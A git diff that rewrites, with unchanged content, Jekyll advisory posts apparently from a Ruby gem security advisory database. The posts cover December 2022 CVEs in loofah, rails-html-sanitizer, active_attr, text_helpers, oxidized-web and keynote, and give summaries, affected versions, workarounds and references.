+  gem: loofah
+  cve: 2022-23514
+  ghsa: 486f-hjj9-9vhh
+  url: https://github.com/flavorjones/loofah/security/advisories/GHSA-486f-hjj9-9vhh
+  title: Inefficient Regular Expression Complexity in Loofah
+  date: 2022-12-13
+  description: |
+    ## Summary
+
+    Loofah `< 2.19.1` contains an inefficient regular expression that is susceptible to excessive backtracking when attempting to sanitize certain SVG attributes. This may lead to a denial of service through CPU resource consumption.
+
+    ## Mitigation
+
+    Upgrade to Loofah `>= 2.19.1`.
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 2.19.1"
+  related:
+    url:
+    - https://cwe.mitre.org/data/definitions/1333.html
+    - https://hackerone.com/reports/1684163
+---
diff --git a/advisories/_posts/2022-12-13-CVE-2022-23515.md b/advisories/_posts/2022-12-13-CVE-2022-23515.md
index 1b47b44b..ae132801 100644
--- a/advisories/_posts/2022-12-13-CVE-2022-23515.md
+++ b/advisories/_posts/2022-12-13-CVE-2022-23515.md
@@ -1,34 +1,34 @@
----
-layout: advisory
-title: 'CVE-2022-23515 (loofah): Improper neutralization of data URIs may allow XSS
-  in Loofah'
-comments: false
-categories:
-- loofah
-advisory:
-  gem: loofah
-  cve: 2022-23515
-  ghsa: 228g-948r-83gx
-  url: https://github.com/flavorjones/loofah/security/advisories/GHSA-228g-948r-83gx
-  title: Improper neutralization of data URIs may allow XSS in Loofah
-  date: 2022-12-13
-  description: |
-    ## Summary
-
-    Loofah `>= 2.1.0, < 2.19.1` is vulnerable to cross-site scripting via the `image/svg+xml` media type in data URIs.
-
-    ## Mitigation
-
-    Upgrade to Loofah `>= 2.19.1`.
-  cvss_v3: 6.1
-  unaffected_versions:
-  - "< 2.1.0"
-  patched_versions:
-  - ">= 2.19.1"
-  related:
-    url:
-    - https://cwe.mitre.org/data/definitions/79.html
-    - https://github.com/w3c/svgwg/issues/266
-    - https://hackerone.com/reports/1694173
-    - https://github.com/flavorjones/loofah/issues/101
----
+---
+layout: advisory
+title: 'CVE-2022-23515 (loofah): Improper neutralization of data URIs may allow XSS
+  in Loofah'
+comments: false
+categories:
+- loofah
+advisory:
+  gem: loofah
+  cve: 2022-23515
+  ghsa: 228g-948r-83gx
+  url: https://github.com/flavorjones/loofah/security/advisories/GHSA-228g-948r-83gx
+  title: Improper neutralization of data URIs may allow XSS in Loofah
+  date: 2022-12-13
+  description: |
+    ## Summary
+
+    Loofah `>= 2.1.0, < 2.19.1` is vulnerable to cross-site scripting via the `image/svg+xml` media type in data URIs.
+
+    ## Mitigation
+
+    Upgrade to Loofah `>= 2.19.1`.
+  cvss_v3: 6.1
+  unaffected_versions:
+  - "< 2.1.0"
+  patched_versions:
+  - ">= 2.19.1"
+  related:
+    url:
+    - https://cwe.mitre.org/data/definitions/79.html
+    - https://github.com/w3c/svgwg/issues/266
+    - https://hackerone.com/reports/1694173
+    - https://github.com/flavorjones/loofah/issues/101
+---
diff --git a/advisories/_posts/2022-12-13-CVE-2022-23516.md b/advisories/_posts/2022-12-13-CVE-2022-23516.md
index d60f7f92..d955e905 100644
--- a/advisories/_posts/2022-12-13-CVE-2022-23516.md
+++ b/advisories/_posts/2022-12-13-CVE-2022-23516.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'CVE-2022-23516 (loofah): Uncontrolled Recursion in Loofah'
-comments: false
-categories:
-- loofah
-advisory:
-  gem: loofah
-  cve: 2022-23516
-  ghsa: 3x8r-x6xp-q4vm
-  url: https://github.com/flavorjones/loofah/security/advisories/GHSA-3x8r-x6xp-q4vm
-  title: Uncontrolled Recursion in Loofah
-  date: 2022-12-13
-  description: |
-    ## Summary
-
-    Loofah `>= 2.2.0, < 2.19.1` uses recursion for sanitizing `CDATA` sections, making it susceptible to stack exhaustion and raising a `SystemStackError` exception.  This may lead to a denial of service through CPU resource consumption.
-
-    ## Mitigation
-
-    Upgrade to Loofah `>= 2.19.1`.
-
-    Users who are unable to upgrade may be able to mitigate this vulnerability by limiting the length of the strings that are sanitized.
-  cvss_v3: 7.5
-  unaffected_versions:
-  - "< 2.2.0"
-  patched_versions:
-  - ">= 2.19.1"
-  related:
-    url:
-    - https://cwe.mitre.org/data/definitions/674.html
----
+---
+layout: advisory
+title: 'CVE-2022-23516 (loofah): Uncontrolled Recursion in Loofah'
+comments: false
+categories:
+- loofah
+advisory:
+  gem: loofah
+  cve: 2022-23516
+  ghsa: 3x8r-x6xp-q4vm
+  url: https://github.com/flavorjones/loofah/security/advisories/GHSA-3x8r-x6xp-q4vm
+  title: Uncontrolled Recursion in Loofah
+  date: 2022-12-13
+  description: |
+    ## Summary
+
+    Loofah `>= 2.2.0, < 2.19.1` uses recursion for sanitizing `CDATA` sections, making it susceptible to stack exhaustion and raising a `SystemStackError` exception.  This may lead to a denial of service through CPU resource consumption.
+
+    ## Mitigation
+
+    Upgrade to Loofah `>= 2.19.1`.
+
+    Users who are unable to upgrade may be able to mitigate this vulnerability by limiting the length of the strings that are sanitized.
+  cvss_v3: 7.5
+  unaffected_versions:
+  - "< 2.2.0"
+  patched_versions:
+  - ">= 2.19.1"
+  related:
+    url:
+    - https://cwe.mitre.org/data/definitions/674.html
+---
diff --git a/advisories/_posts/2022-12-13-CVE-2022-23517.md b/advisories/_posts/2022-12-13-CVE-2022-23517.md
index e424d04a..642bc3f5 100644
--- a/advisories/_posts/2022-12-13-CVE-2022-23517.md
+++ b/advisories/_posts/2022-12-13-CVE-2022-23517.md
@@ -1,30 +1,30 @@
----
-layout: advisory
-title: 'CVE-2022-23517 (rails-html-sanitizer): Inefficient Regular Expression Complexity
-  in rails-html-sanitizer'
-comments: false
-categories:
-- rails-html-sanitizer
-advisory:
-  gem: rails-html-sanitizer
-  cve: 2022-23517
-  ghsa: 5x79-w82f-gw8w
-  url: https://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-5x79-w82f-gw8w
-  title: Inefficient Regular Expression Complexity in rails-html-sanitizer
-  date: 2022-12-13
-  description: |
-    ## Summary
-
-    Certain configurations of rails-html-sanitizer `< 1.4.4` use an inefficient regular expression that is susceptible to excessive backtracking when attempting to sanitize certain SVG attributes. This may lead to a denial of service through CPU resource consumption.
-
-    ## Mitigation
-
-    Upgrade to rails-html-sanitizer `>= 1.4.4`.
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 1.4.4"
-  related:
-    url:
-    - https://cwe.mitre.org/data/definitions/1333.html
-    - https://hackerone.com/reports/1684163
----
+---
+layout: advisory
+title: 'CVE-2022-23517 (rails-html-sanitizer): Inefficient Regular Expression Complexity
+  in rails-html-sanitizer'
+comments: false
+categories:
+- rails-html-sanitizer
+advisory:
+  gem: rails-html-sanitizer
+  cve: 2022-23517
+  ghsa: 5x79-w82f-gw8w
+  url: https://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-5x79-w82f-gw8w
+  title: Inefficient Regular Expression Complexity in rails-html-sanitizer
+  date: 2022-12-13
+  description: |
+    ## Summary
+
+    Certain configurations of rails-html-sanitizer `< 1.4.4` use an inefficient regular expression that is susceptible to excessive backtracking when attempting to sanitize certain SVG attributes. This may lead to a denial of service through CPU resource consumption.
+
+    ## Mitigation
+
+    Upgrade to rails-html-sanitizer `>= 1.4.4`.
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 1.4.4"
+  related:
+    url:
+    - https://cwe.mitre.org/data/definitions/1333.html
+    - https://hackerone.com/reports/1684163
+---
diff --git a/advisories/_posts/2022-12-13-CVE-2022-23518.md b/advisories/_posts/2022-12-13-CVE-2022-23518.md
index f94bc826..a30b0c57 100644
--- a/advisories/_posts/2022-12-13-CVE-2022-23518.md
+++ b/advisories/_posts/2022-12-13-CVE-2022-23518.md
@@ -1,34 +1,34 @@
----
-layout: advisory
-title: 'CVE-2022-23518 (rails-html-sanitizer): Improper neutralization of data URIs
-  may allow XSS in rails-html-sanitizer'
-comments: false
-categories:
-- rails-html-sanitizer
-advisory:
-  gem: rails-html-sanitizer
-  cve: 2022-23518
-  ghsa: mcvf-2q2m-x72m
-  url: https://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-mcvf-2q2m-x72m
-  title: Improper neutralization of data URIs may allow XSS in rails-html-sanitizer
-  date: 2022-12-13
-  description: |
-    ## Summary
-
-    rails-html-sanitizer `>= 1.0.3, < 1.4.4` is vulnerable to cross-site scripting via data URIs when used in combination with Loofah `>= 2.1.0`.
-
-    ## Mitigation
-
-    Upgrade to rails-html-sanitizer `>= 1.4.4`.
-  cvss_v3: 6.1
-  unaffected_versions:
-  - "< 1.0.3"
-  patched_versions:
-  - ">= 1.4.4"
-  related:
-    url:
-    - https://cwe.mitre.org/data/definitions/79.html
-    - https://github.com/w3c/svgwg/issues/266
-    - https://github.com/rails/rails-html-sanitizer/issues/135
-    - https://hackerone.com/reports/1694173
----
+---
+layout: advisory
+title: 'CVE-2022-23518 (rails-html-sanitizer): Improper neutralization of data URIs
+  may allow XSS in rails-html-sanitizer'
+comments: false
+categories:
+- rails-html-sanitizer
+advisory:
+  gem: rails-html-sanitizer
+  cve: 2022-23518
+  ghsa: mcvf-2q2m-x72m
+  url: https://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-mcvf-2q2m-x72m
+  title: Improper neutralization of data URIs may allow XSS in rails-html-sanitizer
+  date: 2022-12-13
+  description: |
+    ## Summary
+
+    rails-html-sanitizer `>= 1.0.3, < 1.4.4` is vulnerable to cross-site scripting via data URIs when used in combination with Loofah `>= 2.1.0`.
+
+    ## Mitigation
+
+    Upgrade to rails-html-sanitizer `>= 1.4.4`.
+  cvss_v3: 6.1
+  unaffected_versions:
+  - "< 1.0.3"
+  patched_versions:
+  - ">= 1.4.4"
+  related:
+    url:
+    - https://cwe.mitre.org/data/definitions/79.html
+    - https://github.com/w3c/svgwg/issues/266
+    - https://github.com/rails/rails-html-sanitizer/issues/135
+    - https://hackerone.com/reports/1694173
+---
diff --git a/advisories/_posts/2022-12-13-CVE-2022-23519.md b/advisories/_posts/2022-12-13-CVE-2022-23519.md
index 554735f8..44774283 100644
--- a/advisories/_posts/2022-12-13-CVE-2022-23519.md
+++ b/advisories/_posts/2022-12-13-CVE-2022-23519.md
@@ -1,84 +1,84 @@
----
-layout: advisory
-title: 'CVE-2022-23519 (rails-html-sanitizer): Possible XSS vulnerability with certain
-  configurations of rails-html-sanitizer'
-comments: false
-categories:
-- rails-html-sanitizer
-advisory:
-  gem: rails-html-sanitizer
-  cve: 2022-23519
-  ghsa: 9h9g-93gc-623h
-  url: https://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-9h9g-93gc-623h
-  title: Possible XSS vulnerability with certain configurations of rails-html-sanitizer
-  date: 2022-12-13
-  description: |
-    ## Summary
-
-    There is a possible XSS vulnerability with certain configurations of Rails::Html::Sanitizer.
-
-    - Versions affected: ALL
-    - Not affected: NONE
-    - Fixed versions: 1.4.4
-
-    ## Impact
-
-    A possible XSS vulnerability with certain configurations of Rails::Html::Sanitizer may allow an attacker to inject content if the application developer has overridden the sanitizer's allowed tags in either of the following ways:
-
-    - allow both "math" and "style" elements,
-    - or allow both "svg" and "style" elements
-
-    Code is only impacted if allowed tags are being overridden. Applications may be doing this in four different ways:
-
-    1. using application configuration:
-
-      ```ruby
-      # In config/application.rb
-      config.action_view.sanitized_allowed_tags = ["math", "style"]
-      # or
-      config.action_view.sanitized_allowed_tags = ["svg", "style"]
-      ```
-
-      see https://guides.rubyonrails.org/configuring.html#configuring-action-view
-
-    2. using a `:tags` option to the Action View helper `sanitize`:
-
-      ```
-      <%= sanitize @comment.body, tags: ["math", "style"] %>
-      <%# or %>
-      <%= sanitize @comment.body, tags: ["svg", "style"] %>
-      ```
-
-      see https://api.rubyonrails.org/classes/ActionView/Helpers/SanitizeHelper.html#method-i-sanitize
-
-    3. using Rails::Html::SafeListSanitizer class method `allowed_tags=`:
-
-      ```ruby
-      # class-level option
-      Rails::Html::SafeListSanitizer.allowed_tags = ["math", "style"]
-      # or
-      Rails::Html::SafeListSanitizer.allowed_tags = ["svg", "style"]
-      ```
-
-    4. using a `:tags` options to the Rails::Html::SafeListSanitizer instance method `sanitize`:
-
-      ```ruby
-      # instance-level option
-      Rails::Html::SafeListSanitizer.new.sanitize(@article.body, tags: ["math", "style"])
-      # or
-      Rails::Html::SafeListSanitizer.new.sanitize(@article.body, tags: ["svg", "style"])
-      ```
-
-    All users overriding the allowed tags by any of the above mechanisms to include (("math" or "svg") and "style") should either upgrade or use one of the workarounds immediately.
-
-    ## Workarounds
-
-    Remove "style" from the overridden allowed tags, or remove "math" and "svg" from the overridden allowed tags.
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 1.4.4"
-  related:
-    url:
-    - https://cwe.mitre.org/data/definitions/79.html
-    - https://hackerone.com/reports/1656627
----
+---
+layout: advisory
+title: 'CVE-2022-23519 (rails-html-sanitizer): Possible XSS vulnerability with certain
+  configurations of rails-html-sanitizer'
+comments: false
+categories:
+- rails-html-sanitizer
+advisory:
+  gem: rails-html-sanitizer
+  cve: 2022-23519
+  ghsa: 9h9g-93gc-623h
+  url: https://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-9h9g-93gc-623h
+  title: Possible XSS vulnerability with certain configurations of rails-html-sanitizer
+  date: 2022-12-13
+  description: |
+    ## Summary
+
+    There is a possible XSS vulnerability with certain configurations of Rails::Html::Sanitizer.
+
+    - Versions affected: ALL
+    - Not affected: NONE
+    - Fixed versions: 1.4.4
+
+    ## Impact
+
+    A possible XSS vulnerability with certain configurations of Rails::Html::Sanitizer may allow an attacker to inject content if the application developer has overridden the sanitizer's allowed tags in either of the following ways:
+
+    - allow both "math" and "style" elements,
+    - or allow both "svg" and "style" elements
+
+    Code is only impacted if allowed tags are being overridden. Applications may be doing this in four different ways:
+
+    1. using application configuration:
+
+      ```ruby
+      # In config/application.rb
+      config.action_view.sanitized_allowed_tags = ["math", "style"]
+      # or
+      config.action_view.sanitized_allowed_tags = ["svg", "style"]
+      ```
+
+      see https://guides.rubyonrails.org/configuring.html#configuring-action-view
+
+    2. using a `:tags` option to the Action View helper `sanitize`:
+
+      ```
+      <%= sanitize @comment.body, tags: ["math", "style"] %>
+      <%# or %>
+      <%= sanitize @comment.body, tags: ["svg", "style"] %>
+      ```
+
+      see https://api.rubyonrails.org/classes/ActionView/Helpers/SanitizeHelper.html#method-i-sanitize
+
+    3. using Rails::Html::SafeListSanitizer class method `allowed_tags=`:
+
+      ```ruby
+      # class-level option
+      Rails::Html::SafeListSanitizer.allowed_tags = ["math", "style"]
+      # or
+      Rails::Html::SafeListSanitizer.allowed_tags = ["svg", "style"]
+      ```
+
+    4. using a `:tags` options to the Rails::Html::SafeListSanitizer instance method `sanitize`:
+
+      ```ruby
+      # instance-level option
+      Rails::Html::SafeListSanitizer.new.sanitize(@article.body, tags: ["math", "style"])
+      # or
+      Rails::Html::SafeListSanitizer.new.sanitize(@article.body, tags: ["svg", "style"])
+      ```
+
+    All users overriding the allowed tags by any of the above mechanisms to include (("math" or "svg") and "style") should either upgrade or use one of the workarounds immediately.
+
+    ## Workarounds
+
+    Remove "style" from the overridden allowed tags, or remove "math" and "svg" from the overridden allowed tags.
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 1.4.4"
+  related:
+    url:
+    - https://cwe.mitre.org/data/definitions/79.html
+    - https://hackerone.com/reports/1656627
+---
diff --git a/advisories/_posts/2022-12-13-CVE-2022-23520.md b/advisories/_posts/2022-12-13-CVE-2022-23520.md
index 51077d8a..2da03020 100644
--- a/advisories/_posts/2022-12-13-CVE-2022-23520.md
+++ b/advisories/_posts/2022-12-13-CVE-2022-23520.md
@@ -1,65 +1,65 @@
----
-layout: advisory
-title: 'CVE-2022-23520 (rails-html-sanitizer): Possible XSS vulnerability with certain
-  configurations of rails-html-sanitizer'
-comments: false
-categories:
-- rails-html-sanitizer
-advisory:
-  gem: rails-html-sanitizer
-  cve: 2022-23520
-  ghsa: rrfc-7g8p-99q8
-  url: https://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-rrfc-7g8p-99q8
-  title: Possible XSS vulnerability with certain configurations of rails-html-sanitizer
-  date: 2022-12-13
-  description: |
-    ## Summary
-
-    There is a possible XSS vulnerability with certain configurations of Rails::Html::Sanitizer. This is due to an incomplete fix of CVE-2022-32209.
-
-    - Versions affected: ALL
-    - Not affected: NONE
-    - Fixed versions: 1.4.4
-
-    ## Impact
-
-    A possible XSS vulnerability with certain configurations of Rails::Html::Sanitizer may allow an attacker to inject content if the application developer has overridden the sanitizer's allowed tags to allow both "select" and "style" elements.
-
-    Code is only impacted if allowed tags are being overridden using either of the following two mechanisms:
-
-    1. Using the Rails configuration `config.action_view.sanitized_allow_tags=`:
-
-      ```ruby
-      # In config/application.rb
-      config.action_view.sanitized_allowed_tags = ["select", "style"]
-      ```
-
-      (see https://guides.rubyonrails.org/configuring.html#configuring-action-view)
-
-    2. Using the class method `Rails::Html::SafeListSanitizer.allowed_tags=`:
-
-      ```ruby
-      # class-level option
-      Rails::Html::SafeListSanitizer.allowed_tags = ["select", "style"]
-      ```
-
-    All users overriding the allowed tags by either of the above mechanisms to include both "select" and "style" should either upgrade or use one of the workarounds immediately.
-
-    NOTE: Code is _not_ impacted if allowed tags are overridden using either of the following mechanisms:
-
-    - the `:tags` option to the Action View helper method `sanitize`.
-    - the `:tags` option to the instance method `SafeListSanitizer#sanitize`.
-
-    ## Workarounds
-
-    Remove either "select" or "style" from the overridden allowed tags.
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 1.4.4"
-  related:
-    cve:
-    - 2022-32209
-    url:
-    - https://cwe.mitre.org/data/definitions/79.html
-    - https://hackerone.com/reports/1654310
----
+---
+layout: advisory
+title: 'CVE-2022-23520 (rails-html-sanitizer): Possible XSS vulnerability with certain
+  configurations of rails-html-sanitizer'
+comments: false
+categories:
+- rails-html-sanitizer
+advisory:
+  gem: rails-html-sanitizer
+  cve: 2022-23520
+  ghsa: rrfc-7g8p-99q8
+  url: https://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-rrfc-7g8p-99q8
+  title: Possible XSS vulnerability with certain configurations of rails-html-sanitizer
+  date: 2022-12-13
+  description: |
+    ## Summary
+
+    There is a possible XSS vulnerability with certain configurations of Rails::Html::Sanitizer. This is due to an incomplete fix of CVE-2022-32209.
+
+    - Versions affected: ALL
+    - Not affected: NONE
+    - Fixed versions: 1.4.4
+
+    ## Impact
+
+    A possible XSS vulnerability with certain configurations of Rails::Html::Sanitizer may allow an attacker to inject content if the application developer has overridden the sanitizer's allowed tags to allow both "select" and "style" elements.
+
+    Code is only impacted if allowed tags are being overridden using either of the following two mechanisms:
+
+    1. Using the Rails configuration `config.action_view.sanitized_allow_tags=`:
+
+      ```ruby
+      # In config/application.rb
+      config.action_view.sanitized_allowed_tags = ["select", "style"]
+      ```
+
+      (see https://guides.rubyonrails.org/configuring.html#configuring-action-view)
+
+    2. Using the class method `Rails::Html::SafeListSanitizer.allowed_tags=`:
+
+      ```ruby
+      # class-level option
+      Rails::Html::SafeListSanitizer.allowed_tags = ["select", "style"]
+      ```
+
+    All users overriding the allowed tags by either of the above mechanisms to include both "select" and "style" should either upgrade or use one of the workarounds immediately.
+
+    NOTE: Code is _not_ impacted if allowed tags are overridden using either of the following mechanisms:
+
+    - the `:tags` option to the Action View helper method `sanitize`.
+    - the `:tags` option to the instance method `SafeListSanitizer#sanitize`.
+
+    ## Workarounds
+
+    Remove either "select" or "style" from the overridden allowed tags.
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 1.4.4"
+  related:
+    cve:
+    - 2022-32209
+    url:
+    - https://cwe.mitre.org/data/definitions/79.html
+    - https://hackerone.com/reports/1654310
+---
diff --git a/advisories/_posts/2022-12-19-CVE-2021-4250.md b/advisories/_posts/2022-12-19-CVE-2021-4250.md
index 03e274f5..71c11dcb 100644
--- a/advisories/_posts/2022-12-19-CVE-2021-4250.md
+++ b/advisories/_posts/2022-12-19-CVE-2021-4250.md
@@ -1,33 +1,33 @@
----
-layout: advisory
-title: 'CVE-2021-4250 (active_attr): active_attr Improper Resource Shutdown or Release
-  vulnerability'
-comments: false
-categories:
-- active_attr
-advisory:
-  gem: active_attr
-  cve: 2021-4250
-  ghsa: 4whf-rmx5-8frv
-  url: https://github.com/cgriego/active_attr/issues/184
-  title: active_attr Improper Resource Shutdown or Release vulnerability
-  date: 2022-12-19
-  description: |
-    A vulnerability classified as problematic has been found in cgriego active_attr
-    up to 0.15.3. This affects the function call of the file
-    lib/active_attr/typecasting/boolean_typecaster.rb of the component Regex Handler.
-    The manipulation of the argument value leads to denial of service. The exploit
-    has been disclosed to the public and may be used. Upgrading to version 0.15.4 can
-    address this issue. The name of the patch is dab95e5843b01525444b82bd7b336ef1d79377df.
-    It is recommended to upgrade the affected component. The associated identifier of
-    this vulnerability is VDB-216207.
-  cvss_v3: 3.5
-  patched_versions:
-  - ">= 0.15.4"
-  related:
-    url:
-    - https://github.com/cgriego/active_attr/pull/185
-    - https://github.com/cgriego/active_attr/commit/dab95e5843b01525444b82bd7b336ef1d79377df
-    - https://github.com/cgriego/active_attr/releases/tag/v0.15.4
-    - https://vuldb.com/?id.216207
----
+---
+layout: advisory
+title: 'CVE-2021-4250 (active_attr): active_attr Improper Resource Shutdown or Release
+  vulnerability'
+comments: false
+categories:
+- active_attr
+advisory:
+  gem: active_attr
+  cve: 2021-4250
+  ghsa: 4whf-rmx5-8frv
+  url: https://github.com/cgriego/active_attr/issues/184
+  title: active_attr Improper Resource Shutdown or Release vulnerability
+  date: 2022-12-19
+  description: |
+    A vulnerability classified as problematic has been found in cgriego active_attr
+    up to 0.15.3. This affects the function call of the file
+    lib/active_attr/typecasting/boolean_typecaster.rb of the component Regex Handler.
+    The manipulation of the argument value leads to denial of service. The exploit
+    has been disclosed to the public and may be used. Upgrading to version 0.15.4 can
+    address this issue. The name of the patch is dab95e5843b01525444b82bd7b336ef1d79377df.
+    It is recommended to upgrade the affected component. The associated identifier of
+    this vulnerability is VDB-216207.
+  cvss_v3: 3.5
+  patched_versions:
+  - ">= 0.15.4"
+  related:
+    url:
+    - https://github.com/cgriego/active_attr/pull/185
+    - https://github.com/cgriego/active_attr/commit/dab95e5843b01525444b82bd7b336ef1d79377df
+    - https://github.com/cgriego/active_attr/releases/tag/v0.15.4
+    - https://vuldb.com/?id.216207
+---
diff --git a/advisories/_posts/2022-12-22-CVE-2020-36624.md b/advisories/_posts/2022-12-22-CVE-2020-36624.md
index fd7ecd4b..e0016fdd 100644
--- a/advisories/_posts/2022-12-22-CVE-2020-36624.md
+++ b/advisories/_posts/2022-12-22-CVE-2020-36624.md
@@ -1,33 +1,33 @@
----
-layout: advisory
-title: 'CVE-2020-36624 (text_helpers): text_helpers uses web link to untrusted target
-  with window.opener access'
-comments: false
-categories:
-- text_helpers
-advisory:
-  gem: text_helpers
-  cve: 2020-36624
-  ghsa: 74hc-57m5-83ch
-  url: https://github.com/ahorner/text-helpers/pull/19
-  title: text_helpers uses web link to untrusted target with window.opener access
-  date: 2022-12-22
-  description: |
-    A vulnerability was found in ahorner text-helpers 1.1.0/1.1.1. It has
-    been declared as critical. This vulnerability affects unknown code of the file
-    lib/text_helpers/translation.rb. The manipulation of the argument link leads to
-    use of web link to untrusted target with window.opener access. The attack can be
-    initiated remotely. Upgrading to version 1.2.0 can address this issue. The name
-    of the patch is 184b60ded0e43c985788582aca2d1e746f9405a3. It is recommended to
-    upgrade the affected component. The identifier of this vulnerability is VDB-216520.
-  cvss_v3: 6.1
-  unaffected_versions:
-  - "< 1.1.0"
-  patched_versions:
-  - ">= 1.2.0"
-  related:
-    url:
-    - https://github.com/ahorner/text-helpers/commit/184b60ded0e43c985788582aca2d1e746f9405a3
-    - https://github.com/ahorner/text-helpers/releases/tag/v1.2.0
-    - https://vuldb.com/?id.216520
----
+---
+layout: advisory
+title: 'CVE-2020-36624 (text_helpers): text_helpers uses web link to untrusted target
+  with window.opener access'
+comments: false
+categories:
+- text_helpers
+advisory:
+  gem: text_helpers
+  cve: 2020-36624
+  ghsa: 74hc-57m5-83ch
+  url: https://github.com/ahorner/text-helpers/pull/19
+  title: text_helpers uses web link to untrusted target with window.opener access
+  date: 2022-12-22
+  description: |
+    A vulnerability was found in ahorner text-helpers 1.1.0/1.1.1. It has
+    been declared as critical. This vulnerability affects unknown code of the file
+    lib/text_helpers/translation.rb. The manipulation of the argument link leads to
+    use of web link to untrusted target with window.opener access. The attack can be
+    initiated remotely. Upgrading to version 1.2.0 can address this issue. The name
+    of the patch is 184b60ded0e43c985788582aca2d1e746f9405a3. It is recommended to
+    upgrade the affected component. The identifier of this vulnerability is VDB-216520.
+  cvss_v3: 6.1
+  unaffected_versions:
+  - "< 1.1.0"
+  patched_versions:
+  - ">= 1.2.0"
+  related:
+    url:
+    - https://github.com/ahorner/text-helpers/commit/184b60ded0e43c985788582aca2d1e746f9405a3
+    - https://github.com/ahorner/text-helpers/releases/tag/v1.2.0
+    - https://vuldb.com/?id.216520
+---
diff --git a/advisories/_posts/2022-12-27-CVE-2019-25088.md b/advisories/_posts/2022-12-27-CVE-2019-25088.md
index a8dd994b..aeefddcb 100644
--- a/advisories/_posts/2022-12-27-CVE-2019-25088.md
+++ b/advisories/_posts/2022-12-27-CVE-2019-25088.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2019-25088 (oxidized-web): Oxidized Web vulnerable to Cross-site Scripting'
-comments: false
-categories:
-- oxidized-web
-advisory:
-  gem: oxidized-web
-  cve: 2019-25088
-  ghsa: 8qwh-rm6c-jv96
-  url: https://github.com/ytti/oxidized-web/pull/195
-  title: Oxidized Web vulnerable to Cross-site Scripting
-  date: 2022-12-27
-  description: |
-    A vulnerability was found in ytti Oxidized Web. It has been classified
-    as problematic. Affected is an unknown function of the file `lib/oxidized/web/views/conf_search.haml`.
-    The manipulation of the argument `to_research` leads to cross site scripting. It
-    is possible to launch the attack remotely. The name of the patch is 55ab9bdc68b03ebce9280b8746ef31d7fdedcc45.
-    It is recommended to apply a patch to fix this issue. VDB-216870 is the identifier
-    assigned to this vulnerability.
-  cvss_v3: 5.4
-  related:
-    url:
-    - https://github.com/ytti/oxidized-web/commit/55ab9bdc68b03ebce9280b8746ef31d7fdedcc45
-    - https://vuldb.com/?id.216870
----
+---
+layout: advisory
+title: 'CVE-2019-25088 (oxidized-web): Oxidized Web vulnerable to Cross-site Scripting'
+comments: false
+categories:
+- oxidized-web
+advisory:
+  gem: oxidized-web
+  cve: 2019-25088
+  ghsa: 8qwh-rm6c-jv96
+  url: https://github.com/ytti/oxidized-web/pull/195
+  title: Oxidized Web vulnerable to Cross-site Scripting
+  date: 2022-12-27
+  description: |
+    A vulnerability was found in ytti Oxidized Web. It has been classified
+    as problematic. Affected is an unknown function of the file `lib/oxidized/web/views/conf_search.haml`.
+    The manipulation of the argument `to_research` leads to cross site scripting. It
+    is possible to launch the attack remotely. The name of the patch is 55ab9bdc68b03ebce9280b8746ef31d7fdedcc45.
+    It is recommended to apply a patch to fix this issue. VDB-216870 is the identifier
+    assigned to this vulnerability.
+  cvss_v3: 5.4
+  related:
+    url:
+    - https://github.com/ytti/oxidized-web/commit/55ab9bdc68b03ebce9280b8746ef31d7fdedcc45
+    - https://vuldb.com/?id.216870
+---
diff --git a/advisories/_posts/2022-12-31-CVE-2017-20159.md b/advisories/_posts/2022-12-31-CVE-2017-20159.md
index bfc64ea4..45fd758b 100644
--- a/advisories/_posts/2022-12-31-CVE-2017-20159.md
+++ b/advisories/_posts/2022-12-31-CVE-2017-20159.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'CVE-2017-20159 (keynote): keynote Cross-site Scripting vulnerability'
-comments: false
-categories:
-- keynote
-advisory:
-  gem: keynote
-  cve: 2017-20159
-  ghsa: 399p-vq28-5hg8
-  url: https://github.com/rf-/keynote/commit/05be4356b0a6ca7de48da926a9b997beb5ffeb4a
-  title: keynote Cross-site Scripting vulnerability
-  date: 2022-12-31
-  description: |
-    A vulnerability was found in rf Keynote up to 0.x. It has been rated
-    as problematic. Affected by this issue is some unknown functionality of the file
-    lib/keynote/rumble.rb. The manipulation of the argument value leads to cross site
-    scripting. The attack may be launched remotely. Upgrading to version 1.0.0 can address
-    this issue. The name of the patch is 05be4356b0a6ca7de48da926a9b997beb5ffeb4a. It
-    is recommended to upgrade the affected component. VDB-217142 is the identifier assigned
-    to this vulnerability.
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 1.0.0"
-  related:
-    url:
-    - https://github.com/rf-/keynote/releases/tag/v1.0.0
-    - https://vuldb.com/?id.217142
----
+---
+layout: advisory
+title: 'CVE-2017-20159 (keynote): keynote Cross-site Scripting vulnerability'
+comments: false
+categories:
+- keynote
+advisory:
+  gem: keynote
+  cve: 2017-20159
+  ghsa: 399p-vq28-5hg8
+  url: https://github.com/rf-/keynote/commit/05be4356b0a6ca7de48da926a9b997beb5ffeb4a
+  title: keynote Cross-site Scripting vulnerability
+  date: 2022-12-31
+  description: |
+    A vulnerability was found in rf Keynote up to 0.x. It has been rated
+    as problematic. Affected by this issue is some unknown functionality of the file
+    lib/keynote/rumble.rb. The manipulation of the argument value leads to cross site
+    scripting. The attack may be launched remotely. Upgrading to version 1.0.0 can address
+    this issue. The name of the patch is 05be4356b0a6ca7de48da926a9b997beb5ffeb4a. It
+    is recommended to upgrade the affected component. VDB-217142 is the identifier assigned
+    to this vulnerability.
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 1.0.0"
+  related:
+    url:
+    - https://github.com/rf-/keynote/releases/tag/v1.0.0
+    - https://vuldb.com/?id.217142
+---
diff --git a/advisories/_posts/2023-01-03-CVE-2024-22049.md b/advisories/_posts/2023-01-03-CVE-2024-22049.md
